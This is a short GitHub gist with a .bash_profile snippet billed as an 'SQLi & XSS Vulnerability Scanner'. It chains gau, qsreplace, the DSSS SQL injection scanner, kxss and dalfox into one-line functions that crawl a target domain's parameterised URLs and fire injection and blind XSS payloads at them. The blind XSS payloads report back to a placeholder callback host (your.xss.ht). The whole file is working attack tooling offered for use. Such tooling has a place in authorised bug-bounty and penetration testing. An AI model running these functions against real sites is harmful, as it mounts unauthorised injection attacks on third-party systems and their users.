Skip to content

Instantly share code, notes, and snippets.

@Spy0x7
Forked from dwisiswant0/.bash_profile
Created March 18, 2021 16:43
Show Gist options
  • Save Spy0x7/8b5cbbbf03c72369d250ed39ab47bae3 to your computer and use it in GitHub Desktop.
Save Spy0x7/8b5cbbbf03c72369d250ed39ab47bae3 to your computer and use it in GitHub Desktop.
SQLi & XSS Vulnerability Scanner
###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###
gauq() {
gau $1 -subs | \
grep "=" | \
egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | \
qsreplace -a
}
sqliz() {
gauq $1 | python3 $HOME/Tools/DSSS/dsss.py
}
bxss() {
BLIND="https://your.xss.ht"
gauq $1 | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | \
dalfox pipe -b $BLIND
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment